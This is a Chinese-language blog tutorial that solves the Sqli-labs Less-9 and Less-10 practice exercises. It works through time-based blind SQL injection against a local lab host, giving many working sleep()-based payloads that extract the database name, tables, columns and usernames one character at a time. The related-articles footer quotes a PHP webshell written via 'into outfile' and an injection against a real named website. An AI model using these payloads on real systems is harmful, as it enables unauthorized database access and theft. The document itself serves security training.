Sqli-labs之Less-9和Less-10

原創 红烧兔纸 2020-04-03 00:26

                                                Less-9

GET - 盲注 - 基於時間 - 單引號

從題目中我們瞭解到了這是一道關於單引號時間盲注的題,那麼我們先嚐試 ?id=1' 發現返回的結果竟然是 You are in ...  什麼情況?於是分別嘗試 ?id=1  ?id=1"  發現結果都是You are in ... 於是可以大膽的猜測正確的輸入和錯誤的輸入返回的結果被設置成一樣的了。

對比後臺源碼:

從源代碼中證明了我們的猜測,由此也可得出這樣的結論:1.不返回報錯信息頁面,無法進行基於報錯信息的盲注。2.頁面不存在true和false兩種不同的頁面,無法進行對比也就無法進行布爾盲注。

PS

無意間看到別的博客提到Content-length的長度不一樣,也可以來判斷頁面正常與否,所以其實這題可以用布爾型盲注來解決。(有興趣的話可以自己嘗試下)

那麼如何破題?

一般來說,在頁面沒有任何回顯和錯誤信息提示的時候,我們就會測試時間盲注這最後的手法。測試下面3條語句:

http://192.168.33.1/sqli/Less-9/?id=1 and sleep(5)-- #

http://192.168.33.1/sqli/Less-9/?id=1' and sleep(5)-- #

http://192.168.33.1/sqli/Less-9/?id=1" and sleep(5)-- #

發現只有第二條語句頁面延遲了,說明這是單引號時間盲注。

常用的判斷語句:

' and if(1,sleep(5),1) %23

' and if(1=0,1,sleep(10)) --+

" and if(1=0,1, sleep(10)) --+

) and if(1=0,1, sleep(10)) --+

') and if(1=0,1, sleep(10)) --+

") and if(1=0,1, sleep(10)) --+

...........

補充小知識:

使用

if(查詢語句,1,sleep(5))

,即如果我們的查詢語句爲真,那麼直接返回結果;如果我們的查詢語句爲假,那麼過5秒之後返回頁面。所以我們就根據返回頁面的時間長短來判斷我們的查詢語句是否執行正確。

  1. if(expr1,expr2,expr3) :判斷語句 如果第一個語句正確就執行第二個語句如果錯誤執行第三個語句

  2. sleep(n)          :將程序掛起一段時間 n單位爲秒

1.然後我們就來猜數據庫長度:

?id=1' and if (length(database())=x ,sleep(5),1)--+

    x從4開始增加,增加到8有明顯的延遲,說明數據庫的長度是8;

http://192.168.33.1/sqli/Less-9/?id=1' and if(length(database())=8,sleep(5),1) -- #

2.猜數據庫名---> 得到security 數據庫:

當前的數據庫名:可以用 <  >  = 比較,對字符進行範圍的判斷,然後用二分法不斷縮小範圍

(下面做下演示,後面將簡單演示了)

http://192.168.33.1/sqli/Less-9/?id=1' and if(left(database(),1)>'r' ,sleep(5),1)-- #           頁面明顯延遲

http://192.168.33.1/sqli/Less-9/?id=1' and if(left(database(),1)>'s' ,sleep(5),1)-- #          頁面明顯延遲

http://192.168.33.1/sqli/Less-9/?id=1' and if(left(database(),1)>'t' ,sleep(5),1)-- #          頁面明顯延遲

http://192.168.33.1/sqli/Less-9/?id=1' and if(left(database(),1)='s' ,sleep(5),1)-- #          頁面明顯延遲

........

http://192.168.33.1/sqli/Less-9/?id=1' and if(left(database(),8)='security' ,sleep(5),1)-- #          頁面明顯延遲

當然也可以這樣寫:

正確的時候直接返回不正確的時候等待 5 秒鐘,只給出正確的:
http://192.168.33.1/sqli/Less-9/?id=1' and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+
說明第一位是 s (ascii 碼是 115)
http://192.168.33.1/sqli/Less-9/?id=1' and If(ascii(substr(database(),2,1))=101,1,sleep(5))--+
說明第一位是 e (ascii 碼是 101)
....
以此類推,我們知道了數據庫名字是 security

3.猜數據庫表

?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit x,1),5)='users',sleep(5),1)--+

    通過limit x,1 中x的變化,我們找到了users表

http://192.168.33.1/sqli/Less-9/?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users',sleep(5),1)--+

注意不建議使用這種方法猜數據庫裏的表,這種猜數據庫表的概率太低,這種寫法只能說你知道了security數據庫可能有 users 表但你不確定,用這種語句可以確定數據庫是否有該表,且該表在第幾行,由下圖可知,users表在第四行,而limit是從0開始的,所以x爲3

既然上面的不靠譜,那麼用另外一種方法吧:

正確的時候直接返回不正確的時候等待 5 秒鐘,只給出正確的:(注意拼寫正確)

http://192.168.33.1/sqli/Less-9/?id=1' and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+

http://192.168.33.1/sqli/Less-9/?id=1' and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109,1,sleep(5))--+

.....
猜測第一個數據表的第一位是 e,...依次類推,得到 emails
http://192.168.33.1/sqli/Less-9/?id=1' and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=114,1,sleep(5))--+

http://192.168.33.1/sqli/Less-9/?id=1' and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))=101,1,sleep(5))--+

.......
猜測第二個數據表的第一位是 r,...依次類推,得到 referers
......
再以此類推,我們可以得到所有的數據表 emails,referers,uagents,users

4.猜users表裏的列 (ASCII碼 i-105)

http://192.168.33.1/sqli/Less-9/?id=1' and If(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))=105,1,sleep(5))--+
猜測 users 表的第一個列第一個字符是 i,
以此類推,我們得到列名是 id,username,password

and table_schema=database()這條語句不能少是因爲要排除其他數據庫可能也會有users表

5.猜username的值(ASCII碼 D=68)

http://192.168.33.1/sqli/Less-9/?id=1' and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))--+
猜測 username 的第一行第一位
以此類推,我們得到數據庫 username,password 的所有內容

以上的過程就是我們利用 sleep()函數注入的整個過程,當然了也可以利用BENCHMARK()函數進行注入,這裏可以自行進行測試。

 

其實if(查詢語句,1,sleep(5))裏面的查詢

語句都可以換成布爾盲注的語句,參考less-5,同理Less-5的語句也能換成less-9的查詢語句,要靈活運用。

如:獲取users表裏的內容(D-68)

http://192.168.33.1/sqli/Less-9/?id=1'and If(ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id limit 0,1),1,1))=68,1,sleep(5))--+

正確的時候直接返回不正確的時候等待 5 秒鐘

http://192.168.33.1/sqli/Less-5/?id=1'and ascii(substr((select username from users limit 0,1),1,1))=68--+

 

=============================  我是分割線  =============================

腳本:

暫未發現好的腳本。

=============================  我是分割線  =============================

                                            Less-10

GET - 盲注 - 基於時間 - 單引號

從題目中我們可以得出這是一道關於雙引號時間盲注的題,也就是和Less-9十分類似,只需把單引號 '  替換成雙引號 " 其他操作不變。

查看下源碼:

所以重複的輪子不在造了,可自行嘗試。

 

 

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

寬字節注入1

寬字節注入原理 GBK 佔用兩字節,即一個符號佔用兩個字節 ASCII佔用一字節 PHP中編碼爲GBK,函數執行添加的是ASCII編碼(添加的符號爲“\”),MYSQL默認字符集是GBK等寬字節字符集。 大家都知道%df’ 被PH

啊哈哈哈765 2020-07-07 22:32:51

寬字節注入2

注入基礎 之前我們在1中講了使用%df 但是沒必要總是使用%df 可以使用其他的 注入代碼分析 下圖第一個函數是替換單引號和雙引號 即將單引號前加斜槓 雙引號前加斜槓 函數功能其實和本身自帶函數功能一樣 記住 寬字節注入mysq

啊哈哈哈765 2020-07-07 22:32:51

i春秋2020新春公益賽 GYCTF有關SQL注入題復現

0x00 前言 最近這段時間參加過一些CTF在線競賽,做過一些Web題,發現SQL注入漏洞出現的頻率可真高!不過在做題中也get到了一些Web新知識,現在通過題目復現的方式總結一下。 0x01 blacklist 考點:堆疊注入+

Qwzf 2020-07-07 18:04:49

PHP魔法函數之magic_quotes_gpc

magic_quotes_gpc 魔法函數存在於PHP 5.3.4及以下版本,作用是對POST、GET、Cookie傳入的數據進行轉義處理,在輸入數據的特殊字符如 單引號(')、雙引號(")、反斜線(\)與 NULL(NULL 字

工科学生死板板 2020-07-06 15:38:15

WEB程序防SQL注入攻擊程序

場景: WEB程序容易被SQL注入攻擊,攻擊原理是在請求參數中傳入非法字符,造成SQL語句出現出現異常情況,已達到攻擊者想要的結果。 分析: 一般的攻擊者都是在傳入的請求參數上做文章,所以我們重點檢查的是request的參數,判斷requ

成都好男人 2020-07-06 07:55:56

淺談SQL注入(入門版)

淺談SQL注入 (篇幅較長,包含對SQL注入的分析) 目錄 一、SQL注入原理 二、SQL注入的探測語句 三、SQL注入的進一步注入 一、SQL注入的原理 解釋型語言:程序不需要編譯,程序在運行時才翻譯成機器語言,每執行

羽路星尘 2020-07-05 06:34:35

Java Web項目解決 sql 注入問題(過濾器進行過濾解決)

** 1、編寫過濾器類—SqlFilter.java ** package com.yl.zp.controller; import java.io.IOException; import java.util.Enumerat

HelloWord_Object 2020-07-04 14:45:27

SQL注入的方式與防治

 所謂的SQL注入、XSS、溢出等的漏洞,歸根到底,就是代碼注入的問題,導致代碼注入漏洞的產生的原因是因爲代碼和數據沒有分離,即程序所處理的數據和程序的代碼混在了一起,沒有明確的區分。。。$oM>?h_ =  ok:L]8UN 3

cduter 2020-07-04 09:33:01

0x05-SQL注入-構造臨時數據

目錄 今日目標 可以學到什麼? 好用的 SQL 在線模擬器 SQLite ALIAS 表達式 表名映射 列名映射 SQLite 如何構造臨時數據? MySQL 如何構造臨時數據? PostgreSQL 如何構造臨時數據?

0pr 2020-07-02 07:14:38

mysql寫入一句話的方式

一、union select 後寫入 最常見的寫入方式,union select 後跟 into outfile 語句 1’ union select 1,2,’<?php @eval($_POST[cmd]);?>’ into

孤君 2020-07-02 01:47:42

NodeJs 安全設計規範

CSRF攻擊 什麼是CSRF? 跨站請求僞造,是一種對網站的惡意利用。儘管聽起來像跨站腳本(XSS),但它與XSS非常不同,XSS利用站點內的信任用戶,而CSRF則通過僞裝成受信任用戶的請求來利用受信任的網站。與XSS攻擊相

多比熊 2020-06-28 18:10:44

【SQL注入篇】MSSQL 報錯注入(2020端午節快樂呀)

當你的才華 還撐不起你的野心時 那你就應該靜下心來學習 目錄 0x01 MSSQL 是個啥? 0x02 MSSQL 注入原理 0x03 MSSQL 常用命令 0x04 復現漏洞       爲什麼要寫這篇文章?因爲最近項目中經常遇到類似的

Agan ' 2020-06-27 13:54:56

數據庫注入方法和繞過技巧

文章目錄背景SQL注入的方法報錯注入概念Payloads數溢出報錯GROUP BY 報錯XPATH 報錯聯合查詢概念Payloads**Mysql >= 5.0**MySQL >= 4.1未知列名的情況堆疊查詢概念Payloads

BingSlient 2020-06-27 05:04:58

簡單的SQL注入某社會組織

好早之前的網站了,漏洞已經被填上了,請大家不要嘗試! 目標:http://www.qdmjzz.org/ 1、首先是拆解:http://www.qdmjzz.org/show.php?id=7829 and 1=2 union selec

Nightsay 2020-06-25 22:36:46

通過兩道CTF題學習過濾單引號的SQL注入

0x00 前言 通常來說,在進行字符型的SQL注入時,都需要先將前面的引號等(以單引號爲例)進行閉合才能執行我們構造的SQL語句,那麼如果單引號被過濾了,是否還能夠成功的SQL注入呢? 答案是可以,當你在判斷登錄時使用的是如下SQ

LetheSec 2020-06-25 08:39:23